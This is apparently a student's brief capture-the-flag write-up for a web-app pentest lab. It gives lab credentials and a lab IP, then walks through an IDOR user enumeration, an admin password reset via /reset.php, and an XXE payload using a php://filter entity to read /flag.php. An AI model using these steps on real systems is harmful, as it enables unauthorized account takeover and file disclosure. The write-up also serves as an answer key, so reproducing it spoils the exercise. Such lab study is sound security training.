Scenario:
Performing a web app pentest for sof comanpym and task y iwth testing the lastest of their social network web app. Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'.
94.237.53.52:5948
Write up:
Enumeration in caido
- Log in the app with the creadentials:
- User htb-student
- Pass: Academy_student!
- Login Requests in Caido:
- 301 redirect response following a successful login.
- 200 ok resposne
- Api get
- Potential IDOR:
We'll focus on the dir /api.php/user/74
Then we cam enumerate the users and find de admin user for login. We can chage the password in the dir /reset.php.
Now we can access to the admin user ---> PWD
4.Exploit with php filetering
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">]>
<root>
<name>&Test;</name>
<details>test</details>
<date></date>
</root>
